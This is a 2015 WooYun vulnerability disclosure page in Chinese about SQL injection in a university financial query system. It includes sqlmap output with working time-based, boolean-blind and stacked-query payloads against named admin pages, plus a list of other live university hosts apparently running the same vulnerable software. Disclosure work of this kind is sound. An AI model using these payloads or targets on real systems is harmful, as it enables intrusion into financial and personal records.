乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-24: 细节已通知厂商并且等待厂商处理中 2015-04-28: 厂商已经确认,细节仅向厂商公开 2015-05-01: 细节向第三方安全合作伙伴开放 2015-06-22: 细节向核心白帽子及相关领域专家公开 2015-07-02: 细节向普通白帽子公开 2015-07-12: 细节向实习白帽子公开 2015-07-27: 细节向公众公开
RT
上海财大科技发展有限公司开发的财务信息查询系统。 http://www.shcdkf.com/某些地方越权的同时还存在注入,越权别人提交过了,好像没人关注注入吧。#1
http://www.shcdkf.com/cwc/KFweb/admin/StudentPassword.aspx
左上角的姓名搜索处存在注入
POST parameter 'txtXm' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection points with a total of 135 HTTP(s) requests:---Place: POSTParameter: txtXm Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: __VIEWSTATE=/wEPDwULLTEzOTc5NzEwNDIPZBYCAgMPZBYEAgQPEA8WBh4NRGF0YVRleHRGaWVsZAUDQm1tHg5EYXRhVmFsdWVGaWVsZAUDQm1oHgtfIURhdGFCb3VuZGdkEBUVDOWFqOmDqOmZouezuy7mr5XkuJrmrKDotLnpg6jpl6ggICAgICAgICAgICAgICAgICAgICAgICAgICAgK+iLseaWh+ezuyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAr5pel5rOV57O7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICvlm73mlL/ns7sgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgK+Wbvee7j+ezuyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAu5paH5YyW5LiO5Lyg5pKt57O7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICvnoJTnqbbnlJ8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgKumrmOiBjCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC3kv6Hmga/np5HmioDns7sgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAr5rOV5b6L57O7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC3lhazlhbHnrqHnkIbns7sgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAt6KGM5pS/566h55CG57O7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLeS4lue7j++8iOeglO+8iSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC3lm73mlL/vvIjnoJTvvIkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAt5Zu95YWz77yI56CU77yJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLeiLseivre+8iOeglO+8iSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC3ml6Xor63vvIjnoJTvvIkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAt5rOV6K+t77yI56CU77yJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLemAmuS/oe+8iOeglO+8iSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC3ljJblrabvvIjnoJTvvIkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAVFQAIMDAwMCAgICAIMDAxICAgICAIMDAyICAgICAIMDAzICAgICAIMDA0ICAgICAIMDA1ICAgICAIMDA2ICAgICAIMDA3ICAgICAIMDA4ICAgICAIMDA5ICAgICAIMDEwICAgICAIMDExICAgICAIMDEyICAgICAIMDEzICAgICAIMDE0ICAgICAIMDE1ICAgICAIMDE2ICAgICAIMDE3ICAgICAIMDE4ICAgICAIMDE5ICAgICAUKwMVZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZGQCBw88KwANAQAPFgQfAmceC18hSXRlbUNvdW50ZmRkGAEFCUdyaWRWaWV3MQ88KwAKAQhmZIGzOebdIAYfkMXUMKOHqTKDCojC&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWGAK4zZukBAKD++r3AwK9xc+fCwKT/pLDCALUuM/hCQKZnoKWBgLi2P7oCgKnvrKdBwLo+K7vCwKt3uHjAQL2mN71BALr/pO1CQKsu/CHDAKT/taSBQLUuLPlCQKZnoaZBgLi2OLrCgKnvrZgAuj4kvILAq3e5eYBAvaYwvgEAuv+l7gJAqy79IoMAtGF4vgJN8kpcW/g0byM6DFBGf0DrpU9hS0=&txtXm=1'; WAITFOR DELAY '0:0:5'--&ddlDepart=&btFilter=%B9%FD%C2%CB&GridView1$ctl13$AspNetPager1_input=1 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: __VIEWSTATE=/wEPDwULLTEzOTc5NzEwNDIPZBYCAgMPZBYEAgQPEA8WBh4NRGF0YVRleHRGaWVsZAUDQm1tHg5EYXRhVmFsdWVGaWVsZAUDQm1oHgtfIURhdGFCb3VuZGdkEBUVDOWFqOmDqOmZouezuy7mr5XkuJrmrKDotLnpg6jpl6ggICAgICAgICAgICAgICAgICAgICAgICAgICAgK+iLseaWh+ezuyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAr5pel5rOV57O7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICvlm73mlL/ns7sgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgK+Wbvee7j+ezuyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAu5paH5YyW5LiO5Lyg5pKt57O7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICvnoJTnqbbnlJ8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgKumrmOiBjCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC3kv6Hmga/np5HmioDns7sgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAr5rOV5b6L57O7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC3lhazlhbHnrqHnkIbns7sgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAt6KGM5pS/566h55CG57O7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLeS4lue7j++8iOeglO+8iSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC3lm73mlL/vvIjnoJTvvIkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAt5Zu95YWz77yI56CU77yJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLeiLseivre+8iOeglO+8iSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC3ml6Xor63vvIjnoJTvvIkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAt5rOV6K+t77yI56CU77yJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLemAmuS/oe+8iOeglO+8iSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC3ljJblrabvvIjnoJTvvIkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAVFQAIMDAwMCAgICAIMDAxICAgICAIMDAyICAgICAIMDAzICAgICAIMDA0ICAgICAIMDA1ICAgICAIMDA2ICAgICAIMDA3ICAgICAIMDA4ICAgICAIMDA5ICAgICAIMDEwICAgICAIMDExICAgICAIMDEyICAgICAIMDEzICAgICAIMDE0ICAgICAIMDE1ICAgICAIMDE2ICAgICAIMDE3ICAgICAIMDE4ICAgICAIMDE5ICAgICAUKwMVZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZGQCBw88KwANAQAPFgQfAmceC18hSXRlbUNvdW50ZmRkGAEFCUdyaWRWaWV3MQ88KwAKAQhmZIGzOebdIAYfkMXUMKOHqTKDCojC&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWGAK4zZukBAKD++r3AwK9xc+fCwKT/pLDCALUuM/hCQKZnoKWBgLi2P7oCgKnvrKdBwLo+K7vCwKt3uHjAQL2mN71BALr/pO1CQKsu/CHDAKT/taSBQLUuLPlCQKZnoaZBgLi2OLrCgKnvrZgAuj4kvILAq3e5eYBAvaYwvgEAuv+l7gJAqy79IoMAtGF4vgJN8kpcW/g0byM6DFBGf0DrpU9hS0=&txtXm=1' WAITFOR DELAY '0:0:5'--&ddlDepart=&btFilter=%B9%FD%C2%CB&GridView1$ctl13$AspNetPager1_input=1---[19:37:02] [INFO] testing Microsoft SQL Server[19:37:02] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errorsdo you want sqlmap to try to optimize value(s) for DBMS delay responses (option'--time-sec')? [Y/n] y[19:37:11] [INFO] confirming Microsoft SQL Server[19:37:17] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2000[19:37:17] [WARNING] HTTP error codes detected during run:500 (Internal Server Error) - 21 times[19:37:17] [INFO] fetched data logged to text files under 'C:\Users\sith\.sqlmap\output\www.shcdkf.com'
#2
http://www.shcdkf.com/KfWeb/admin/UserManager.aspx
用户管理处左上角的用户搜索也存在注入
POST parameter 'txtXm' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection points with a total of 57 HTTP(s) requests:---Place: POSTParameter: txtXm Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: __VIEWSTATE=/wEPDwUKMTA3MTk3NTE1NQ9kFgICAw9kFgYCBQ88KwANAQAPFgQeC18hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnQCAWQWAmYPZBYGAgEPZBYQZg9kFggCAQ8PFgQeBFRleHQFBuWwgeWtmB4PQ29tbWFuZEFyZ3VtZW50BQoyMDA2MDMwMDAxZGQCAw8PFgYfAgUG5q2j5bi4HwMFCjIwMDYwMzAwMDEeB0VuYWJsZWRoZGQCBQ8PFgIeDU9uQ2xpZW50Q2xpY2sFywF3aW5kb3cub3BlbignVXNlck1hbmFnZXJQd2QuYXNweD9teXVzZXI9MjAwNjAzMDAwMScsJ215d2luZG93Jywnd2lkdGg9NDAwcHgsaGVpZ2h0PTMwMHB4LHRvb2xiYXI9bm8sZGlyZWN0b3JpZXM9bm8sbG9jYXRpb249bm8sbWVudWJhcj1ubyxzdGF0dXM9bm8sc2Nyb2xsYmFyPW5vLHJlc2l6YWJsZT1ubyxkaXJlY3Rvcmllcz0wJyk7cmV0dXJuIGZhbHNlO2RkAgcPDxYEHwUFPHJldHVybiBjb25maXJtKCfmuIXpmaTlkI7vvIzor6XkurrlkZjlj6/ku6Xph43mlrDms6jlhozvvIEnKR8DBQoyMDA2MDMwMDAxZGQCAQ8PFgIfAgUKMjAwNjAzMDAwMWRkAgIPDxYCHwIFCjIwMDYwMzAwMDFkZAIDDw8WAh8CBQnkuo7lkJHoi7FkZAIEDw8WAh8CBSPlrabmoKHlip7lhazlrqQgICAgICAgICAgICAgICAgICAgIGRkAgUPDxYCHwIFETIwMTUtMy01IDIxOjI1OjQzZGQCBg8PFgIfAgURMjAxNS00LTE4IDg6NTI6MjlkZAIHDw8WAh8CBU48YSBocmVmPSdTaG93UGVyc29uUmlnaHRzLmFzcHg/R2g9MjAwNjAzMDAwMScgdGFyZ2V0PSdfYmxhbmsnPuafpeivouadg+mZkDwvYT5kZAICDw8WAh4HVmlzaWJsZWhkZAIDDw8WAh8GaGQWAmYPZBYCAgEPDxYEHgtSZWNvcmRjb3VudAIBHghQYWdlU2l6ZQIPZGQCBw8PFgIfBQW6AXdpbmRvdy5vcGVuKCdBZGRSZWdpc3RlclVzZXIuYXNweCcsJ215d2luZG93Jywnd2lkdGg9NDAwcHgsaGVpZ2h0PTM1MHB4LHRvb2xiYXI9bm8sZGlyZWN0b3JpZXM9bm8sbG9jYXRpb249bm8sbWVudWJhcj1ubyxzdGF0dXM9bm8sc2Nyb2xsYmFyPW5vLHJlc2l6YWJsZT1ubyxkaXJlY3Rvcmllcz0wJyk7cmV0dXJuIGZhbHNlO2RkAgkPDxYCHwUFtwF3aW5kb3cub3BlbignR2VuZXJhdGVVc2VyLmFzcHgnLCdteXdpbmRvdycsJ3dpZHRoPTQwMHB4LGhlaWdodD0zNTBweCx0b29sYmFyPW5vLGRpcmVjdG9yaWVzPW5vLGxvY2F0aW9uPW5vLG1lbnViYXI9bm8sc3RhdHVzPW5vLHNjcm9sbGJhcj1ubyxyZXNpemFibGU9bm8sZGlyZWN0b3JpZXM9MCcpO3JldHVybiBmYWxzZTtkZBgBBQlHcmlkVmlldzEPPCsACgEIAgFkQ2lW1nkfhDL6199KEGgRKURAdJY=&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWCQK26sH2AQKD++r3AwLRheL4CQLs0OGkDwLD2cqLDQKsp7mUDQL1xbPEAgKqp5XCAgLU8r71CRN4XHRWPL11zk84BB+75MV0DscA&txtXm=2006030001' AND 3130=3130 AND 'Ojzn'='Ojzn&btFilter=%B9%FD%C2%CB&GridView1$ctl18$AspNetPager1_input=1 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: __VIEWSTATE=/wEPDwUKMTA3MTk3NTE1NQ9kFgICAw9kFgYCBQ88KwANAQAPFgQeC18hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnQCAWQWAmYPZBYGAgEPZBYQZg9kFggCAQ8PFgQeBFRleHQFBuWwgeWtmB4PQ29tbWFuZEFyZ3VtZW50BQoyMDA2MDMwMDAxZGQCAw8PFgYfAgUG5q2j5bi4HwMFCjIwMDYwMzAwMDEeB0VuYWJsZWRoZGQCBQ8PFgIeDU9uQ2xpZW50Q2xpY2sFywF3aW5kb3cub3BlbignVXNlck1hbmFnZXJQd2QuYXNweD9teXVzZXI9MjAwNjAzMDAwMScsJ215d2luZG93Jywnd2lkdGg9NDAwcHgsaGVpZ2h0PTMwMHB4LHRvb2xiYXI9bm8sZGlyZWN0b3JpZXM9bm8sbG9jYXRpb249bm8sbWVudWJhcj1ubyxzdGF0dXM9bm8sc2Nyb2xsYmFyPW5vLHJlc2l6YWJsZT1ubyxkaXJlY3Rvcmllcz0wJyk7cmV0dXJuIGZhbHNlO2RkAgcPDxYEHwUFPHJldHVybiBjb25maXJtKCfmuIXpmaTlkI7vvIzor6XkurrlkZjlj6/ku6Xph43mlrDms6jlhozvvIEnKR8DBQoyMDA2MDMwMDAxZGQCAQ8PFgIfAgUKMjAwNjAzMDAwMWRkAgIPDxYCHwIFCjIwMDYwMzAwMDFkZAIDDw8WAh8CBQnkuo7lkJHoi7FkZAIEDw8WAh8CBSPlrabmoKHlip7lhazlrqQgICAgICAgICAgICAgICAgICAgIGRkAgUPDxYCHwIFETIwMTUtMy01IDIxOjI1OjQzZGQCBg8PFgIfAgURMjAxNS00LTE4IDg6NTI6MjlkZAIHDw8WAh8CBU48YSBocmVmPSdTaG93UGVyc29uUmlnaHRzLmFzcHg/R2g9MjAwNjAzMDAwMScgdGFyZ2V0PSdfYmxhbmsnPuafpeivouadg+mZkDwvYT5kZAICDw8WAh4HVmlzaWJsZWhkZAIDDw8WAh8GaGQWAmYPZBYCAgEPDxYEHgtSZWNvcmRjb3VudAIBHghQYWdlU2l6ZQIPZGQCBw8PFgIfBQW6AXdpbmRvdy5vcGVuKCdBZGRSZWdpc3RlclVzZXIuYXNweCcsJ215d2luZG93Jywnd2lkdGg9NDAwcHgsaGVpZ2h0PTM1MHB4LHRvb2xiYXI9bm8sZGlyZWN0b3JpZXM9bm8sbG9jYXRpb249bm8sbWVudWJhcj1ubyxzdGF0dXM9bm8sc2Nyb2xsYmFyPW5vLHJlc2l6YWJsZT1ubyxkaXJlY3Rvcmllcz0wJyk7cmV0dXJuIGZhbHNlO2RkAgkPDxYCHwUFtwF3aW5kb3cub3BlbignR2VuZXJhdGVVc2VyLmFzcHgnLCdteXdpbmRvdycsJ3dpZHRoPTQwMHB4LGhlaWdodD0zNTBweCx0b29sYmFyPW5vLGRpcmVjdG9yaWVzPW5vLGxvY2F0aW9uPW5vLG1lbnViYXI9bm8sc3RhdHVzPW5vLHNjcm9sbGJhcj1ubyxyZXNpemFibGU9bm8sZGlyZWN0b3JpZXM9MCcpO3JldHVybiBmYWxzZTtkZBgBBQlHcmlkVmlldzEPPCsACgEIAgFkQ2lW1nkfhDL6199KEGgRKURAdJY=&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWCQK26sH2AQKD++r3AwLRheL4CQLs0OGkDwLD2cqLDQKsp7mUDQL1xbPEAgKqp5XCAgLU8r71CRN4XHRWPL11zk84BB+75MV0DscA&txtXm=2006030001' AND 1435=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'Uasz'='Uasz&btFilter=%B9%FD%C2%CB&GridView1$ctl18$AspNetPager1_input=1---[19:44:16] [INFO] testing Microsoft SQL Server[19:44:16] [INFO] confirming Microsoft SQL Server[19:44:17] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2000
其他测试案例:
http://gzcx.tynu.edu.cn/cwc/KFweb/admin/UserManager.aspxhttp://cycwc.gzife.edu.cn/kefa/admin/UserManager.aspxhttp://59.72.128.44/KfWeb/admin/UserManager.aspxhttp://www.cqvie.com/xfcxsq/admin/UserManager.aspxhttp://cwch.ahu.edu.cn/querynetweb/admin/UserManager.aspxhttp://gzcx.tynu.edu.cn/KfWeb/admin/UserManager.aspxhttp://cwc.sxufe.edu.cn/KfWeb/admin/UserManager.aspxhttp://221.5.51.228/cjb/admin/UserManager.aspx
危害等级:高
漏洞Rank:11
确认时间:2015-04-28 09:26
CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式(或以往建立的处置渠道)向网站管理单位(软件生产厂商)通报。
暂无